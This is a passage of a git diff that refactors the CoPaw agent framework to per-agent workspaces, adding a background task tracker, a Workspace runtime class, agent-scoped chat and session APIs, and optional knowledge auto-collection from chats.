datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S") - filename = f"copaw_workspace_{timestamp}.zip" + filename = f"copaw_workspace_{agent.agent_id}_{timestamp}.zip" return StreamingResponse( buf, @@ -152,20 +156,24 @@ async def download_workspace(): summary="Upload zip and merge into workspace", description=( "Upload a zip archive. Paths present in the zip are merged into " - "WORKING_DIR (files overwritten, dirs merged). Paths not in the zip " - "are left unchanged (e.g. copaw.db, runtime dirs). Download packs " - "the entire WORKING_DIR; upload only overwrites/merges zip contents." + "agent workspace (files overwritten, dirs merged). Paths not in " + "the zip are left unchanged (e.g. copaw.db, runtime dirs). " + "Download packs the entire workspace; upload only " + "overwrites/merges zip contents." ), ) async def upload_workspace( + request: Request, file: UploadFile = File( ..., - description="Zip archive to merge into WORKING_DIR", + description="Zip archive to merge into agent workspace", ), ) -> dict: """ - Merge uploaded zip contents into WORKING_DIR (overwrite, do not clear). + Merge uploaded zip contents into agent workspace (overwrite, not clear). """ + from ..agent_context import get_agent_for_request + if file.content_type and file.content_type not in ( "application/zip", "application/x-zip-compressed", @@ -178,10 +186,12 @@ async def upload_workspace( ), ) + agent = await get_agent_for_request(request) + workspace_dir = agent.workspace_dir data = await file.read() try: - await asyncio.to_thread(_validate_and_extract_zip, data) + await asyncio.to_thread(_validate_and_extract_zip, data, workspace_dir) return {"success": True} except HTTPException: raise diff --git a/src/copaw/app/runner/api.py b/src/copaw/app/runner/api.py index 6862b7849..25761a9d5 100644 --- a/src/copaw/app/runner/api.py +++ b/src/copaw/app/runner/api.py @@ -18,46 +18,47 @@ router = APIRouter(prefix="/chats", tags=["chats"]) -def get_chat_manager(request: Request) -> ChatManager: - """Get the chat manager from app state. +async def get_workspace(request: Request): + """Get the workspace for the active agent.""" + from ..agent_context import get_agent_for_request + + return await get_agent_for_request(request) + + +async def get_chat_manager( + request: Request, +) -> ChatManager: + """Get the chat manager for the active agent. Args: request: FastAPI request object Returns: - ChatManager instance + ChatManager instance for the specified agent Raises: HTTPException: If manager is not initialized """ - mgr = getattr(request.app.state, "chat_manager", None) - if mgr is None: - raise HTTPException( - status_code=503, - detail="Chat manager not initialized", - ) - return mgr + workspace = await get_workspace(request) + return workspace.chat_manager -def get_session(request: Request) -> SafeJSONSession: - """Get the session from app state. +async def get_session( + request: Request, +) -> SafeJSONSession: + """Get the session for the active agent. Args: request: FastAPI request object Returns: - SafeJSONSession instance + SafeJSONSession instance for the specified agent Raises: HTTPException: If session is not initialized """ - runner = getattr(request.app.state, "runner", None) - if runner is None: - raise HTTPException( - status_code=503, - detail="Session not initialized", - ) - return runner.session + workspace = await get_workspace(request) + return workspace.runner.session @router.get("", response_model=list[ChatSpec]) @@ -65,6 +66,7 @@ async def list_chats( user_id: Optional[str] = Query(None, description="Filter by user ID"), channel: Optional[str] = Query(None, description="Filter by channel"), mgr: ChatManager = Depends(get_chat_manager), + workspace=Depends(get_workspace), ): """List all chats with optional filters. @@ -73,7 +75,13 @@ async def list_chats( channel: Optional channel name to filter chats mgr: Chat manager dependency """ - return await mgr.list_chats(user_id=user_id, channel=channel) + chats = await mgr.list_chats(user_id=user_id, channel=channel) + tracker = workspace.task_tracker + result = [] + for spec in chats: + status = await tracker.get_status(spec.id) + result.append(spec.model_copy(update={"status": status})) + return result @router.post("", response_model=ChatSpec) @@ -127,6 +135,7 @@ async def get_chat( chat_id: str, mgr: ChatManager = Depends(get_chat_manager), session: SafeJSONSession = Depends(get_session), + workspace=Depends(get_workspace), ): """Get detailed information about a specific chat by UUID. @@ -136,7 +145,7 @@ async def get_chat( session: SafeJSONSession dependency Returns: - ChatHistory with messages + ChatHistory with messages and status (idle/running) Raises: HTTPException: If chat not found (404) @@ -152,15 +161,16 @@ async def get_chat( chat_spec.session_id, chat_spec.user_id, ) + status = await workspace.task_tracker.get_status(chat_id) if not state: - return ChatHistory(messages=[]) + return ChatHistory(messages=[], status=status) memories = state.get("agent", {}).get("memory", []) memory = InMemoryMemory() memory.load_state_dict(memories) memories = await memory.get_memory() messages = agentscope_msg_to_message(memories) - return ChatHistory(messages=messages) + return ChatHistory(messages=messages, status=status) @router.put("/{chat_id}", response_model=ChatSpec) diff --git a/src/copaw/app/runner/command_dispatch.py b/src/copaw/app/runner/command_dispatch.py index 585dde2ef..e05e86071 100644 --- a/src/copaw/app/runner/command_dispatch.py +++ b/src/copaw/app/runner/command_dispatch.py @@ -7,9 +7,9 @@ import logging from typing import AsyncIterator +from typing import TYPE_CHECKING from agentscope.message import Msg, TextBlock -from reme.memory.file_based.reme_in_memory_memory import ReMeInMemoryMemory from .daemon_commands import ( DaemonContext, @@ -17,11 +17,13 @@ parse_daemon_query, ) from ...agents.command_handler import CommandHandler -from ...agents.utils.token_counting import _get_token_counter -from ...config import load_config +from ...config.config import load_agent_config logger = logging.getLogger(__name__) +if TYPE_CHECKING: + from .runner import AgentRunner + def _get_last_user_text(msgs) -> str | None: """Extract last user message text from msgs (runtime message list).""" @@ -61,7 +63,7 @@ def _is_command(query: str | None) -> bool: async def run_command_path( request, msgs, - runner, + runner: AgentRunner, ) -> AsyncIterator[tuple]: """Run command path and yield (msg, last) for each response. @@ -106,8 +108,10 @@ async def run_command_path( ], ) yield hint, True + + agent_id = runner.agent_id context = DaemonContext( - load_config_fn=load_config, + load_config_fn=lambda: load_agent_config(agent_id), memory_manager=runner.memory_manager, restart_callback=restart_cb, session_id=session_id, @@ -118,19 +122,21 @@ async def run_command_path( return # Conversation path: lightweight memory + CommandHandler - memory = ReMeInMemoryMemory(token_counter=_get_token_counter()) + memory = runner.memory_manager.get_in_memory_memory() session_state = await runner.session.get_session_state_dict( session_id=session_id, user_id=user_id, ) - memory_state = session_state.get("agent", {}).get("memory") - memory.load_state_dict(memory_state) + memory_state = session_state.get("agent", {}).get("memory", {}) + memory.load_state_dict(memory_state, strict=False) + agent_config = load_agent_config(runner.agent_id) conv_handler = CommandHandler( agent_name="Friday", memory=memory, memory_manager=runner.memory_manager, enable_memory_manager=runner.memory_manager is not None, + agent_config=agent_config, ) try: response_msg = await conv_handler.handle_conversation_command(query) diff --git a/src/copaw/app/runner/daemon_commands.py b/src/copaw/app/runner/daemon_commands.py index a27406653..04ea3ae90 100644 --- a/src/copaw/app/runner/daemon_commands.py +++ b/src/copaw/app/runner/daemon_commands.py @@ -11,13 +11,16 @@ import logging from dataclasses import dataclass from pathlib import Path -from typing import Any, Awaitable, Callable, Optional +from typing import Any, Awaitable, Callable, Optional, TYPE_CHECKING from agentscope.message import Msg, TextBlock from ...constant import WORKING_DIR from ...config import load_config +if TYPE_CHECKING: + from ...config.config import AgentProfileConfig + RestartCallback = Callable[[], Awaitable[None]] logger = logging.getLogger(__name__) @@ -96,7 +99,12 @@ def run_daemon_status(context: DaemonContext) -> str: try: cfg = context.load_config_fn() parts.append("- Config loaded: yes") - if getattr(cfg, "agents", None) and getattr( + # Support both AgentProfileConfig (has 'running' directly) + # and Config (has 'agents.running') + if hasattr(cfg, "running"): + max_in = getattr(cfg.running, "max_input_length", "N/A") + parts.append(f"- Max input length: {max_in}") + elif getattr(cfg, "agents", None) and getattr( cfg.agents, "running", None, diff --git a/src/copaw/app/runner/manager.py b/src/copaw/app/runner/manager.py index 19b59e408..f7a51c9ca 100644 --- a/src/copaw/app/runner/manager.py +++ b/src/copaw/app/runner/manager.py @@ -35,6 +35,9 @@ def __init__( """ self._repo = repo self._lock = asyncio.Lock() + logger.info( + f"ChatManager created with repo path: {repo.path}", + ) # ----- Read Operations ----- @@ -53,6 +56,10 @@ async def list_chats( List of chat specifications """ async with self._lock: + logger.debug( + f"list_chats: repo path={self._repo.path}, " + f"filters: user_id={user_id}, channel={channel}", + ) return await self._repo.filter_chats( user_id=user_id, channel=channel, @@ -92,21 +99,34 @@ async def get_or_create_chat( """ async with self._lock: # Try to find existing by session_id + logger.debug( + f"get_or_create_chat: Searching for existing chat: " + f"session_id={session_id}, user_id={user_id}, " + f"channel={channel}", + ) existing = await self._repo.get_chat_by_id( session_id, user_id, channel, ) if existing: + logger.debug( + f"get_or_create_chat: Found existing chat: {existing.id}", + ) return existing # Create new + logger.debug( + f"get_or_create_chat: Creating new chat for " + f"session_id={session_id}", + ) spec = ChatSpec( session_id=session_id, user_id=user_id, channel=channel, name=name, ) + logger.debug(f"get_or_create_chat: created spec={spec.id}") # Call internal create without lock (already locked) await self._repo.upsert_chat(spec) logger.debug( diff --git a/src/copaw/app/runner/models.py b/src/copaw/app/runner/models.py index ac39e3a0a..d00105fd7 100644 --- a/src/copaw/app/runner/models.py +++ b/src/copaw/app/runner/models.py @@ -41,12 +41,21 @@ class ChatSpec(BaseModel): default_factory=dict, description="Additional metadata", ) + status: str = Field( + default="idle", + description="Conversation status: idle or running", + exclude=True, + ) class ChatHistory(BaseModel): """Complete chat view with spec and state.""" messages: list[Message] = Field(default_factory=list) + status: str = Field( + default="idle", + description="Conversation status: idle or running", + ) class ChatsFile(BaseModel): diff --git a/src/copaw/app/runner/query_error_dump.py b/src/copaw/app/runner/query_error_dump.py index ffd11d135..37af112e3 100644 --- a/src/copaw/app/runner/query_error_dump.py +++ b/src/copaw/app/runner/query_error_dump.py @@ -7,7 +7,7 @@ import os import tempfile import traceback -from datetime import datetime +from datetime import datetime, timezone from typing import Any from ..channels.schema import DEFAULT_CHANNEL @@ -80,7 +80,9 @@ def write_query_error_dump( "request_info": request_info, "request": request_full, "agent_state": agent_state, - "ts_utc": datetime.utcnow().isoformat() + "Z", + "ts_utc": datetime.now(timezone.utc).strftime( + "%Y-%m-%dT%H:%M:%SZ", + ), } fd, path = tempfile.mkstemp( prefix="copaw_query_error_", diff --git a/src/copaw/app/runner/repo/base.py b/src/copaw/app/runner/repo/base.py index a0daa0afd..2ade1ffc8 100644 --- a/src/copaw/app/runner/repo/base.py +++ b/src/copaw/app/runner/repo/base.py @@ -60,14 +60,28 @@ async def get_chat_by_id( Returns: ChatSpec or None if not found """ + import logging + + logger = logging.getLogger(__name__) + cf = await self.load() + + logger.debug( + f"get_chat_by_id: Searching in {len(cf.chats)} chats for " + f"session_id={session_id}, user_id={user_id}, " + f"channel={channel}", + ) + for chat in cf.chats: if ( chat.session_id == session_id and chat.user_id == user_id and chat.channel == channel ): + logger.debug(f"get_chat_by_id: Found match: {chat.id}") return chat + + logger.debug("get_chat_by_id: No match found") return None async def upsert_chat(self, spec: ChatSpec) -> None: diff --git a/src/copaw/app/runner/runner.py b/src/copaw/app/runner/runner.py index 7db622279..9cbe8cf76 100644 --- a/src/copaw/app/runner/runner.py +++ b/src/copaw/app/runner/runner.py @@ -7,6 +7,7 @@ import logging import time from pathlib import Path +from typing import TYPE_CHECKING from agentscope.message import Msg, TextBlock from agentscope.pipeline import stream_printing_messages @@ -23,23 +24,33 @@ from .session import SafeJSONSession from .utils import build_env_context from ..channels.schema import DEFAULT_CHANNEL -from ...agents.memory import MemoryManager from ...agents.react_agent import CoPawAgent from ...security.tool_guard.models import TOOL_GUARD_DENIED_MARK -from ...config import load_config +from ...config import load_config, save_config from ...constant import ( TOOL_GUARD_APPROVAL_TIMEOUT_SECONDS, WORKING_DIR, ) from ...security.tool_guard.approval import ApprovalDecision +if TYPE_CHECKING: + from ...agents.memory import MemoryManager + logger = logging.getLogger(__name__) class AgentRunner(Runner): - def __init__(self) -> None: + def __init__( + self, + agent_id: str = "default", + workspace_dir: Path | None = None, + ) -> None: super().__init__() self.framework_type = "agentscope" + self.agent_id = agent_id # Store agent_id for config loading + self.workspace_dir = ( + workspace_dir # Store workspace_dir for prompt building + ) self._chat_manager = None # Store chat_manager reference self._mcp_manager = None # MCP client manager for hot-reload self.memory_manager: MemoryManager | None = None @@ -149,6 +160,10 @@ async def query_handler( """ Handle agent query. """ + logger.debug( + f"AgentRunner.query_handler called: agent_id={self.agent_id}, " + f"msgs={msgs}, request={request}", + ) query = _get_last_user_text(msgs) session_id = getattr(request, "session_id", "") or "" @@ -172,9 +187,22 @@ async def query_handler( yield msg, last return + logger.debug( + f"AgentRunner.stream_query: request={request}, " + f"agent_id={self.agent_id}", + ) + + # Set agent context for model creation + from ..agent_context import set_current_agent_id + + set_current_agent_id(self.agent_id) + agent = None chat = None session_state_loaded = False + generated_messages = [] + config = None + knowledge_manager = None try: session_id = request.session_id user_id = request.user_id @@ -199,7 +227,11 @@ async def query_handler( session_id=session_id, user_id=user_id, channel=channel, - working_dir=str(WORKING_DIR), + working_dir=( + str(self.workspace_dir) + if self.workspace_dir + else str(WORKING_DIR) + ), ) # Get MCP clients from manager (hot-reloadable) @@ -208,10 +240,38 @@ async def query_handler( mcp_clients = await self._mcp_manager.get_clients() config = load_config() + running = config.agents.running + + try: + should_collect_user_assets = bool( + getattr(running, "knowledge_auto_collect_chat_files", False) + or getattr(running, "knowledge_auto_collect_chat_urls", True) + ) + if should_collect_user_assets: + from ...knowledge import KnowledgeManager + + knowledge_manager = KnowledgeManager(WORKING_DIR) + user_stage_result = knowledge_manager.auto_collect_user_message_assets( + config.knowledge, + session_id=session_id, + user_id=user_id, + request_messages=list(msgs or []), + running_config=running, + ) + if user_stage_result.get("changed"): + save_config(config) + except Exception: + logger.exception( + "Failed to auto-collect user assets for session %s", + session_id, + ) + max_iters = config.agents.running.max_iters max_input_length = config.agents.running.max_input_length + effective_msgs = list(msgs or []) agent = CoPawAgent( + agent_config=agent_config, env_context=env_context, mcp_clients=mcp_clients, memory_manager=self.memory_manager, @@ -219,9 +279,9 @@ async def query_handler( "session_id": session_id, "user_id": user_id, "channel": channel, + "agent_id": self.agent_id, }, - max_iters=max_iters, - max_input_length=max_input_length, + workspace_dir=self.workspace_dir, ) await agent.register_mcp_clients() agent.set_console_output_enabled(enabled=False) @@ -238,13 +298,31 @@ async def query_handler( else: name = "Media Message" + logger.debug( + f"DEBUG chat_manager status: " + f"_chat_manager={self._chat_manager}, " + f"is_none={self._chat_manager is None}, " + f"agent_id={self.agent_id}", + ) + if self._chat_manager is not None: + logger.debug( + f"Runner: Calling get_or_create_chat for " + f"session_id={session_id}, user_id={user_id}, " + f"channel={channel}, name={name}", + ) chat = await self._chat_manager.get_or_create_chat( session_id, user_id, channel, name=name, ) + logger.debug(f"Runner: Got chat: {chat.id}") + else: + logger.warning( + f"ChatManager is None! Cannot auto-register chat for " + f"session_id={session_id}", + ) try: await self.session.load_session_state( @@ -267,8 +345,9 @@ async def query_handler( async for msg, last in stream_printing_messages( agents=[agent], - coroutine_task=agent(msgs), + coroutine_task=agent(effective_msgs), ): + generated_messages.append(msg) yield msg, last except asyncio.CancelledError as exc: @@ -305,6 +384,40 @@ async def query_handler( agent=agent, ) + if config is not None and session_id: + try: + running = config.agents.running + should_auto_collect = bool( + getattr(running, "knowledge_auto_collect_chat_files", False) + or getattr(running, "knowledge_auto_collect_long_text", False) + ) + + if should_auto_collect: + from ...knowledge import KnowledgeManager + + manager = knowledge_manager or KnowledgeManager(WORKING_DIR) + + should_auto_collect_text = bool( + getattr(running, "knowledge_auto_collect_long_text", False), + ) + + if should_auto_collect_text: + text_result = manager.auto_collect_turn_text_pair( + config.knowledge, + running_config=running, + session_id=session_id, + user_id=user_id, + request_messages=list(msgs or []), + response_messages=generated_messages, + ) + if text_result.get("changed"): + save_config(config) + except Exception: + logger.exception( + "Failed to auto-collect chat knowledge for session %s", + session_id, + ) + if self._chat_manager is not None and chat is not None: await self._chat_manager.update_chat(chat) @@ -423,7 +536,8 @@ async def init_handler(self, *args, **kwargs): Init handler. """ # Load environment variables from .env file - env_path = Path(__file__).resolve().parents[4] / ".env" + # env_path = Path(__file__).resolve().parents[4] / ".env" + env_path = Path("./") / ".env" if env_path.exists(): load_dotenv(env_path) logger.debug(f"Loaded environment variables from {env_path}") @@ -433,24 +547,13 @@ async def init_handler(self, *args, **kwargs): "using existing environment variables", ) - session_dir = str(WORKING_DIR / "sessions") + session_dir = str( + (self.workspace_dir if self.workspace_dir else WORKING_DIR) + / "sessions", + ) self.session = SafeJSONSession(save_dir=session_dir) - try: - if self.memory_manager is None: - self.memory_manager = MemoryManager( - working_dir=str(WORKING_DIR), - ) - await self.memory_manager.start() - except Exception as e: - logger.exception(f"MemoryManager start failed: {e}") - async def shutdown_handler(self, *args, **kwargs): """ Shutdown handler. """ - try: - if self.memory_manager is not None: - await self.memory_manager.close() - except Exception as e: - logger.warning(f"MemoryManager stop failed: {e}") diff --git a/src/copaw/app/runner/task_tracker.py b/src/copaw/app/runner/task_tracker.py new file mode 100644 index 000000000..140bcd2f5 --- /dev/null +++ b/src/copaw/app/runner/task_tracker.py @@ -0,0 +1,176 @@ +# -*- coding: utf-8 -*- +"""Task tracker for background runs: streaming, reconnect, multi-subscriber. + +run_key is ChatSpec.id (chat_id). Per run: task, queues, event buffer. +Reconnects get buffer replay + new events. Cleanup when task completes. +""" +from __future__ import annotations + +import asyncio +import json +import logging +import weakref +from dataclasses import dataclass, field +from typing import Any, AsyncGenerator, Callable, Coroutine + +logger = logging.getLogger(__name__) + +_QUEUE_MAX_SIZE = 4096 +_SENTINEL = None + + +@dataclass +class _RunState: + """Per-run state (task, queues, buffer), guarded by tracker lock.""" + + task: asyncio.Future + queues: list[asyncio.Queue] = field(default_factory=list) + buffer: list[str] = field(default_factory=list) + + +class TaskTracker: + """Per-workspace tracker: run_key -> RunState. + + All mutations to _runs under _lock. Producer broadcasts under lock. + Dead queues pruned when full. + """ + + def __init__(self) -> None: + self._lock = asyncio.Lock() + self._runs: dict[str, _RunState] = {} + + @property + def lock(self) -> asyncio.Lock: + return self._lock + + async def get_status(self, run_key: str) -> str: + """Return ``'idle'`` or ``'running'``.""" + async with self._lock: + state = self._runs.get(run_key) + if state is None or state.task.done(): + return "idle" + return "running" + + async def attach(self, run_key: str) -> asyncio.Queue | None: + """Attach to an existing run. + + Returns a new queue pre-filled with the event buffer, or ``None`` + if no run is active for *run_key*. + """ + async with self._lock: + state = self._runs.get(run_key) + if state is None or state.task.done(): + return None + q: asyncio.Queue = asyncio.Queue(maxsize=_QUEUE_MAX_SIZE) + for sse in state.buffer: + q.put_nowait(sse) + state.queues.append(q) + return q + + async def request_stop(self, run_key: str) -> bool: + """Cancel the run. Returns ``True`` if it was running.""" + async with self._lock: + state = self._runs.get(run_key) + if state is None or state.task.done(): + return False + state.task.cancel() + return True + + async def attach_or_start( + self, + run_key: str, + payload: Any, + stream_fn: Callable[..., Coroutine], + ) -> tuple[asyncio.Queue, bool]: + """Attach to an existing run or start a new one. + + Returns ``(queue, is_new_run)``. + """ + async with self._lock: + state = self._runs.get(run_key) + if state is not None and not state.task.done(): + q: asyncio.Queue = asyncio.Queue(maxsize=_QUEUE_MAX_SIZE) + for sse in state.buffer: + q.put_nowait(sse) + state.queues.append(q) + return q, False + + my_queue: asyncio.Queue = asyncio.Queue(maxsize=_QUEUE_MAX_SIZE) + run = _RunState( + task=asyncio.Future(), # placeholder, replaced below + queues=[my_queue], + buffer=[], + ) + self._runs[run_key] = run + + tracker_ref = weakref.ref(self) + + async def _producer() -> None: + try: + async for sse in stream_fn(payload): + tracker = tracker_ref() + if tracker is None: + return + async with tracker.lock: + run.buffer.append(sse) + alive: list[asyncio.Queue] = [] + for q in run.queues: + try: + q.put_nowait(sse) + alive.append(q) + except asyncio.QueueFull: + logger.warning( + "dropping subscriber queue (full) " + "run_key=%s", + run_key, + ) + # Prune dead queues (full = client not reading) + run.queues = alive + except asyncio.CancelledError: + logger.debug("run cancelled run_key=%s", run_key) + except Exception: + logger.exception("run error run_key=%s", run_key) + err_sse = ( + "data: " + f"{json.dumps({'error': 'internal server error'})}\n\n" + ) + tracker = tracker_ref() + if tracker is not None: + async with tracker.lock: + run.buffer.append(err_sse) + for q in run.queues: + try: + q.put_nowait(err_sse) + except asyncio.QueueFull: + pass + finally: + tracker = tracker_ref() + if tracker is not None: + async with tracker.lock: + for q in run.queues: + try: + q.put_nowait(_SENTINEL) + except asyncio.QueueFull: + pass + # pylint: disable=protected-access + tracker._runs.pop( + run_key, + None, + ) + + run.task = asyncio.create_task(_producer()) + return my_queue, True + + @staticmethod + async def stream_from_queue( + queue: asyncio.Queue, + ) -> AsyncGenerator[str, None]: + """Yield SSE strings from *queue* until the sentinel ``None``.""" + while True: + try: + event = await queue.get() + if event is _SENTINEL: + break + yield event + except asyncio.CancelledError: + break diff --git a/src/copaw/app/runner/utils.py b/src/copaw/app/runner/utils.py index d141c84be..2455aee93 100644 --- a/src/copaw/app/runner/utils.py +++ b/src/copaw/app/runner/utils.py @@ -1,8 +1,12 @@ # -*- coding: utf-8 -*- import json +import logging +import platform from datetime import datetime, timezone from typing import Optional, Union, List from urllib.parse import urlparse +from zoneinfo import ZoneInfo, ZoneInfoNotFoundError + from agentscope.message import Msg from agentscope_runtime.engine.schemas.agent_schemas import ( Message, @@ -12,6 +16,10 @@ ) from agentscope_runtime.engine.helpers.agent_api_builder import ResponseBuilder +from ...config import load_config + +logger = logging.getLogger(__name__) + def build_env_context( session_id: Optional[str] = None, @@ -33,27 +41,42 @@ def build_env_context( Formatted environment context string """ parts = [] - now_utc = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC (%A)") - parts.append(f"- 当前 UTC 时间: {now_utc}") + user_tz = load_config().user_timezone or "UTC" + try: + now = datetime.now(ZoneInfo(user_tz)) + except (ZoneInfoNotFoundError, KeyError): + logger.warning("Invalid timezone %r, falling back to UTC", user_tz) + now = datetime.now(timezone.utc) + user_tz = "UTC" + if session_id is not None: - parts.append(f"- 当前的session_id: {session_id}") + parts.append(f"- Session ID: {session_id}") if user_id is not None: - parts.append(f"- 当前的user_id: {user_id}") + parts.append(f"- User ID: {user_id}") if channel is not None: - parts.append(f"- 当前的channel: {channel}") + parts.append(f"- Channel: {channel}") + + parts.append( + f"- OS: {platform.system()} {platform.release()} " + f"({platform.machine()})", + ) if working_dir is not None: - parts.append(f"- 工作目录: {working_dir}") + parts.append(f"- Working directory: {working_dir}") + parts.append( + f"- Current time: {now.strftime('%Y-%m-%d %H:%M:%S')} " + f"{user_tz} ({now.strftime('%A')})", + ) if add_hint: parts.append( - "- 重要提示:\n" - " 1. 完成任务时,优先考虑使用 skills" - "(例如定时任务,优先使用 cron skill)。" - "对于不清楚的 skills,请先查阅相关对应文档。\n" - " 2. 使用 write_file 写文件时,如果担心覆盖原有内容," - "可以先用 read_file 查看文件内容," - "再使用 edit_file 工具进行局部内容更新或追加内容。", + "- Important:\n" + " 1. Prefer using skills when completing tasks " + "(e.g. use the cron skill for scheduled tasks). " + "Consult the relevant skill documentation if unsure.\n" + " 2. When using write_file, if you want to avoid overwriting " + "existing content, use read_file first to inspect the file, " + "then use edit_file for partial updates or appending.", ) return ( diff --git a/src/copaw/app/workspace.py b/src/copaw/app/workspace.py new file mode 100644 index 000000000..832763f24 --- /dev/null +++ b/src/copaw/app/workspace.py @@ -0,0 +1,447 @@ +# -*- coding: utf-8 -*- +"""Workspace: Encapsulates a complete independent agent runtime. + +Each Workspace represents a standalone agent workspace with its own: +- Runner (request processing) +- ChannelManager (communication channels) +- MemoryManager (conversation memory) +- MCPClientManager (MCP tool clients) +- CronManager (scheduled tasks) + +All existing single-agent components are reused without modification. +""" +import asyncio +import logging +from pathlib import Path +from typing import Optional, TYPE_CHECKING + +from .runner import AgentRunner +from .runner.task_tracker import TaskTracker +from .channels.utils import make_process_from_runner +from .mcp import MCPClientManager +from .crons.manager import CronManager +from .crons.repo.json_repo import JsonJobRepository +from ..agents.memory import MemoryManager +from ..config.config import load_agent_config + +if TYPE_CHECKING: + from .channels.base import BaseChannel + +logger = logging.getLogger(__name__) + + +class Workspace: + """Single agent workspace with complete runtime components. + + Each Workspace is an independent agent instance with its own: + - Runner: Processes agent requests + - ChannelManager: Manages communication channels + - MemoryManager: Manages conversation memory + - MCPClientManager: Manages MCP tool clients + - CronManager: Manages scheduled tasks + + All components use existing single-agent code without modification. + """ + + def __init__(self, agent_id: str, workspace_dir: str): + """Initialize agent instance. + + Args: + agent_id: Unique agent identifier + workspace_dir: Path to agent's workspace directory + """ + self.agent_id = agent_id + self.workspace_dir = Path(workspace_dir).expanduser() + self.workspace_dir.mkdir(parents=True, exist_ok=True) + + # All components are None until start() is called (lazy loading) + self._runner: Optional[AgentRunner] = None + self._channel_manager: Optional["BaseChannel"] = None + self._memory_manager: Optional[MemoryManager] = None + self._mcp_manager: Optional[MCPClientManager] = None + self._cron_manager: Optional["CronManager"] = None + self._chat_manager = None + self._config = None + self._config_watcher = None + self._mcp_config_watcher = None + self._task_tracker = TaskTracker() + self._started = False + + logger.debug( + f"Created Workspace: {agent_id} at {self.workspace_dir}", + ) + + @property + def runner(self) -> Optional[AgentRunner]: + """Get runner instance.""" + return self._runner + + @property + def channel_manager(self) -> Optional["BaseChannel"]: + """Get channel manager instance.""" + return self._channel_manager + + @property + def memory_manager(self) -> Optional[MemoryManager]: + """Get memory manager instance.""" + return self._memory_manager + + @property + def mcp_manager(self) -> Optional[MCPClientManager]: + """Get MCP client manager instance.""" + return self._mcp_manager + + @property + def cron_manager(self) -> Optional["CronManager"]: + """Get cron manager instance.""" + return self._cron_manager + + @property + def chat_manager(self): + """Get chat manager instance.""" + return self._chat_manager + + @property + def task_tracker(self) -> TaskTracker: + """Get task tracker for background chat and reconnect.""" + return self._task_tracker + + @property + def config(self): + """Get agent configuration.""" + if self._config is None: + self._config = load_agent_config(self.agent_id) + return self._config + + async def start(self): # pylint: disable=too-many-statements + """Start workspace and initialize all components concurrently.""" + if self._started: + logger.debug(f"Workspace already started: {self.agent_id}") + return + + logger.info(f"Starting workspace: {self.agent_id}") + + try: + # 1. Load agent configuration from workspace/agent.json + self._config = load_agent_config(self.agent_id) + agent_config = self._config + logger.debug(f"Loaded config for agent: {self.agent_id}") + + # 2. Create Runner + self._runner = AgentRunner( + agent_id=self.agent_id, + workspace_dir=self.workspace_dir, + ) + + # 3. Concurrently initialize MemoryManager and MCPManager + # IMPORTANT: Create MemoryManager BEFORE runner.start() to prevent + # init_handler from creating a duplicate MemoryManager + async def init_memory(): + try: + self._memory_manager = MemoryManager( + working_dir=str(self.workspace_dir), + agent_config=agent_config, + ) + # Assign to runner BEFORE starting runner + self._runner.memory_manager = self._memory_manager + await self._memory_manager.start() + logger.debug( + f"MemoryManager started for agent: {self.agent_id}", + ) + except Exception as e: + logger.exception( + f"Failed to initialize MemoryManager for agent " + f"{self.agent_id}: {e}", + ) + + async def init_mcp(): + try: + self._mcp_manager = MCPClientManager() + if agent_config.mcp: + try: + await self._mcp_manager.init_from_config( + agent_config.mcp, + ) + logger.debug( + f"MCP clients initialized for agent: " + f"{self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Failed to initialize MCP for agent " + f"{self.agent_id}: {e}", + ) + self._runner.set_mcp_manager(self._mcp_manager) + except Exception as e: + logger.exception( + f"Failed to initialize MCPClientManager for agent " + f"{self.agent_id}: {e}", + ) + + async def init_chat(): + try: + from .runner.manager import ChatManager + from .runner.repo.json_repo import JsonChatRepository + + chats_path = str(self.workspace_dir / "chats.json") + chat_repo = JsonChatRepository(chats_path) + self._chat_manager = ChatManager(repo=chat_repo) + self._runner.set_chat_manager(self._chat_manager) + logger.info( + f"ChatManager started for agent {self.agent_id}: " + f"chats.json={chats_path}", + ) + except Exception as e: + logger.exception( + f"Failed to initialize ChatManager for agent " + f"{self.agent_id}: {e}", + ) + + # Now start the runner (after MemoryManager is set) + await self._runner.start() + logger.debug(f"Runner started for agent: {self.agent_id}") + + # Run Memory, MCP, and Chat initialization concurrently + await asyncio.gather(init_memory(), init_mcp(), init_chat()) + + # Set up restart callback for /daemon restart command + from .workspace_restart import create_restart_callback + + setattr( + self._runner, + "_restart_callback", + create_restart_callback(self), + ) + + # 4. Start ChannelManager (depends on Runner) + if agent_config.channels: + from ..config import Config, update_last_dispatch + from .channels.manager import ChannelManager + + temp_config = Config(channels=agent_config.channels) + + # Create a closure to bind agent_id to update_last_dispatch + def on_last_dispatch_with_agent_id( + channel: str, + user_id: str, + session_id: str, + ) -> None: + update_last_dispatch( + channel=channel, + user_id=user_id, + session_id=session_id, + agent_id=self.agent_id, + ) + + self._channel_manager = ChannelManager.from_config( + process=make_process_from_runner(self._runner), + config=temp_config, + on_last_dispatch=on_last_dispatch_with_agent_id, + workspace_dir=self.workspace_dir, + ) + await self._channel_manager.start_all() + logger.debug( + f"ChannelManager started for agent: {self.agent_id}", + ) + + # 5. Start CronManager (always start for API access and cron jobs) + job_repo = JsonJobRepository( + str(self.workspace_dir / "jobs.json"), + ) + self._cron_manager = CronManager( + repo=job_repo, + runner=self._runner, + channel_manager=self._channel_manager, + timezone="UTC", + agent_id=self.agent_id, + ) + # Always start CronManager (it will register cron jobs and + # optionally add heartbeat based on config) + await self._cron_manager.start() + + heartbeat_status = ( + "enabled" + if (agent_config.heartbeat and agent_config.heartbeat.enabled) + else "disabled" + ) + logger.debug( + f"CronManager started for agent {self.agent_id} " + f"(heartbeat: {heartbeat_status})", + ) + + # 6. Start config watchers for hot-reload (non-blocking) + await self._start_config_watchers() + + self._started = True + logger.info( + f"Workspace started successfully: {self.agent_id}", + ) + + except Exception as e: + logger.error( + f"Failed to start agent instance {self.agent_id}: {e}", + ) + # Clean up partially started components + await self.stop() + raise + + async def stop(self): + """Stop agent instance and clean up all resources.""" + if not self._started: + logger.debug(f"Workspace not started: {self.agent_id}") + return + + logger.info(f"Stopping agent instance: {self.agent_id}") + + # Stop components in reverse order + + # 0. Stop config watchers first + await self._stop_config_watchers() + + # 1. Stop CronManager + if self._cron_manager: + try: + await self._cron_manager.stop() + logger.debug( + f"CronManager stopped for agent: {self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Error stopping CronManager for agent " + f"{self.agent_id}: {e}", + ) + + # 2. Stop ChannelManager + if 